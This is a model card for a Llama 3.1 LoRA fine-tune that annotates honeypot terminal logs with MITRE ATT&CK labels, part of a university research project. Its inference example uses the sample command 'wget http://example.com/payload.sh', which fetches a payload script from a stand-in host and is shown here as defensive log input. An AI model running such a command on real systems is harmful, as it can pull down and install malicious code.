| --- |
| license: mit |
| base_model: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit |
| tags: |
| - cybersecurity |
| - mitre-attack |
| - honeypot |
| - log-analysis |
| - llama |
| - lora |
| - security |
| - threat-detection |
| language: |
| - en |
| datasets: |
| - custom |
| library_name: transformers |
| pipeline_tag: text-generation |
| --- |
| |
| # LLM-Enhanced Honeypot Log Analysis Model |
|
|
| ## Model Description |
|
|
| This model is a fine-tuned version of Llama 3.1 8B Instruct, specialized for analyzing honeypot logs and generating MITRE ATT&CK framework annotations. It was developed as part of a research project at Queen's University Belfast investigating automated security log analysis using Large Language Models. |
|
|
| ## Key Features |
|
|
| - **MITRE ATT&CK Annotation**: Automatically generates structured annotations for security events |
| - **Honeypot Log Analysis**: Specialized in analyzing Unix terminal logs from honeypot systems |
| - **LoRA Fine-tuning**: Uses Low-Rank Adaptation for efficient parameter updates |
| - **Research-Grade**: Developed for academic research in cybersecurity and AI |
|
|
| ## Model Details |
|
|
| ### Base Model |
| - **Base Model**: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit |
| - **Model Size**: 8B parameters |
| - **Architecture**: Llama 3.1 with Instruct tuning |
| - **Quantization**: 4-bit (bitsandbytes), inherited from the base checkpoint |
|
|
| ### Fine-tuning Details |
| - **Method**: LoRA (Low-Rank Adaptation) |
| - **LoRA Rank**: 32 |
| - **LoRA Alpha**: 32 |
| - **LoRA Dropout**: 0 |
| - **Learning Rate**: 0.00012 |
| - **Batch Size**: 2 |
| - **Gradient Accumulation**: 4 |
| - **Max Steps**: 100 |
| - **Optimizer**: adamw_8bit |
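
The hyperparameters above imply a few derived quantities that this card does not state directly. The sketch below works them out in plain Python. The variable names are illustrative, the scaling factor assumes the standard LoRA convention of alpha / rank (a rank-stabilized variant would scale differently), and the batch arithmetic assumes training on a single device.

```python
# Hyperparameters copied from the Fine-tuning Details list.
lora_rank = 32
lora_alpha = 32
batch_size = 2
gradient_accumulation = 4
max_steps = 100

# Standard LoRA scales the low-rank update by alpha / rank (assumed here).
lora_scale = lora_alpha / lora_rank

# Sequences contributing to each optimizer step (single device assumed).
effective_batch_size = batch_size * gradient_accumulation

# Upper bound on sequences processed over the whole run.
sequences_seen = effective_batch_size * max_steps

print(lora_scale, effective_batch_size, sequences_seen)
```

With rank equal to alpha, the adapter update is applied at a scale of 1.0, and 100 steps at an effective batch size of 8 cover at most 800 training sequences.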
| |
| ## Training Data |
| |
| The model was trained on a curated dataset of honeypot logs with human-annotated MITRE ATT&CK framework labels. The training data includes: |
| |
| - Unix terminal command logs from honeypot systems |
| - Structured annotations for 6 key MITRE ATT&CK fields |
| - Balanced representation of different attack tactics and techniques |
| |
| ## Usage |
| |
| ### Installation |
| |
| ```bash |
| pip install transformers torch unsloth |
| ``` |
| |
| ### Loading the Model |
| |
| ```python |
| from unsloth import FastLanguageModel |
| |
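| model, tokenizer = FastLanguageModel.from_pretrained( |
|     model_name="your-username/model-name",  # placeholder: replace with this model's repository ID |
|     max_seq_length=2048, |
|     dtype=None,  # None lets Unsloth auto-detect a suitable dtype |
|     load_in_4bit=True,  # load the weights in 4-bit, matching the base checkpoint |
| ) |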
| ``` |
| |
| ### Inference |
|
|
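| ```python |
| # Enable Unsloth's inference mode |
| FastLanguageModel.for_inference(model) |
| |
| # Prompt template; the placeholders are filled in with str.format() below |
| prompt_template = '''Below is a Unix terminal command log from a honeypot system. Please analyze it and provide MITRE ATT&CK framework annotations. |
| |
| Command: {command} |
| Timestamp: {timestamp} |
| Source IP: {source_ip} |
| |
| Please provide: |
| 1. Tactic |
| 2. Technique |
| 3. Sub-technique |
| 4. Description''' |
| |
| # Illustrative values only; replace them with fields from your own log entry |
| prompt = prompt_template.format( |
|     command="wget http://example.com/payload.sh", |
|     timestamp="2025-01-01T00:00:00Z", |
|     source_ip="192.0.2.10", |
| ) |
| |
| # Tokenize and move the tensors to the same device as the model |
| inputs = tokenizer(prompt, return_tensors="pt").to(model.device) |
| # do_sample=True is required for temperature to take effect |
| outputs = model.generate(**inputs, max_new_tokens=1024, do_sample=True, temperature=0.7) |
| # The decoded text contains the prompt followed by the generated answer |
| response = tokenizer.decode(outputs[0], skip_special_tokens=True) |
| ``` |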
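
Because the decoded response is free text, downstream tooling usually needs the prompt built consistently and the answer turned back into fields. The following is a minimal sketch of both steps. `build_prompt` and `parse_annotation` are hypothetical helpers, not part of this model or of Unsloth, and the parser assumes the model answers with lines shaped like `1. Tactic: ...`, which this card does not guarantee. The sample response is hand-written for illustration and is not real model output.

```python
import re

# Template copied from the Inference section of this card.
PROMPT_TEMPLATE = '''Below is a Unix terminal command log from a honeypot system. Please analyze it and provide MITRE ATT&CK framework annotations.

Command: {command}
Timestamp: {timestamp}
Source IP: {source_ip}

Please provide:
1. Tactic
2. Technique
3. Sub-technique
4. Description'''

# The four items requested by the prompt above.
FIELDS = ("Tactic", "Technique", "Sub-technique", "Description")


def build_prompt(command: str, timestamp: str, source_ip: str) -> str:
    """Fill the template with one log entry (hypothetical helper)."""
    return PROMPT_TEMPLATE.format(
        command=command, timestamp=timestamp, source_ip=source_ip
    )


def parse_annotation(text: str) -> dict:
    """Collect 'N. Field: value' lines; fields that are absent are skipped."""
    result = {}
    for field in FIELDS:
        pattern = rf"^\s*\d+\.\s*{re.escape(field)}\s*:\s*(.+)$"
        match = re.search(pattern, text, flags=re.MULTILINE)
        if match:
            result[field] = match.group(1).strip()
    return result


# Hand-written example of the assumed answer shape (not real model output).
sample_response = """1. Tactic: Command and Control
2. Technique: Ingress Tool Transfer
3. Sub-technique: None
4. Description: Downloads a remote script with wget."""

print(parse_annotation(sample_response))
```

The numbered items echoed from the prompt carry no colon, so the parser ignores them and only picks up the answer lines, even when the decoded text still contains the prompt.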
|
|
| ## Evaluation |
|
|
| The model was evaluated with the following metrics and analyses: |
|
|
| - **Overall MITRE Accuracy**: Novel composite metric combining all 6 MITRE ATT&CK field accuracies |
| - **Confusion Matrix Analysis**: Visual analysis of tactics classification performance |
| - **Field-level Accuracy**: Individual accuracy for each MITRE ATT&CK field |
| - **Human Evaluation**: Expert validation of generated annotations |
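
This card does not define how the composite metric is computed, so the following is only one plausible reading, sketched under stated assumptions: field-level accuracy is taken as the exact-match rate per field (after trimming whitespace and lowercasing), and the composite is taken as the unweighted mean of those rates. The function names, the field keys `tactic` and `technique`, and the two example records are all hypothetical.

```python
from typing import Dict, List, Sequence

Record = Dict[str, str]


def field_accuracy(predictions: List[Record], references: List[Record], field: str) -> float:
    """Share of records whose predicted value matches the reference for one field."""
    if not references or len(predictions) != len(references):
        raise ValueError("predictions and references must be non-empty and equal in length")
    hits = sum(
        1
        for pred, ref in zip(predictions, references)
        if pred.get(field, "").strip().lower() == ref[field].strip().lower()
    )
    return hits / len(references)


def composite_accuracy(
    predictions: List[Record], references: List[Record], fields: Sequence[str]
) -> float:
    """Unweighted mean of per-field accuracies (an assumed definition)."""
    scores = [field_accuracy(predictions, references, f) for f in fields]
    return sum(scores) / len(scores)


# Hypothetical annotations, written by hand for illustration.
references = [
    {"tactic": "Discovery", "technique": "System Information Discovery"},
    {"tactic": "Execution", "technique": "Command and Scripting Interpreter"},
]
predictions = [
    {"tactic": "Discovery", "technique": "System Information Discovery"},
    {"tactic": "Execution", "technique": "Ingress Tool Transfer"},
]

for name in ("tactic", "technique"):
    print(name, field_accuracy(predictions, references, name))
print("composite", composite_accuracy(predictions, references, ("tactic", "technique")))
```

Exact matching is a strict choice that suits categorical fields such as tactic and technique; a free-text field such as a description would likely need a different comparison.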
|
|
| ## Limitations |
|
|
| - Specialized for honeypot log analysis; it may not generalize to other security contexts |
| - Requires a structured input format for optimal performance |
| - Training data limited to specific honeypot configurations |
| - May exhibit biases present in training data |
|
|
| ## Ethical Considerations |
|
|
| This model is designed for defensive cybersecurity research and should be used responsibly: |
|
|
| - Intended for legitimate security research and defense applications |
| - Should not be used for malicious purposes or unauthorized access |
| - Users should validate outputs before making security decisions |
| - Consider privacy implications when analyzing logs |
|
|
| ## Citation |
|
|
| If you use this model in your research, please cite: |
|
|
| ```bibtex |
| @misc{llm_honeypot_analysis_2025, |
| title={LLM-Enhanced Honeypot Log Analysis System}, |
| author={[Student Name]}, |
| year={2025}, |
| institution={Queen's University Belfast}, |
| course={CSC4006 - Research Project}, |
| url={https://gitlab.eeecs.qub.ac.uk/[student-id]/CSC4006} |
| } |
| ``` |
|
|
| ## License |
|
|
| This model is released under the MIT License. See the LICENSE file for details. |
|
|
| ## Contact |
|
|
| For questions or issues: |
| - Repository: https://gitlab.eeecs.qub.ac.uk/40285272/CSC4006 |
| - Institution: Queen's University Belfast |
| - Course: CSC4006 - Research Project |
|
|
| ## Acknowledgments |
|
|
| - Built using the Unsloth library for efficient training |
| - Based on Meta's Llama 3.1 model |
| - Developed as part of cybersecurity research at Queen's University Belfast |
|
|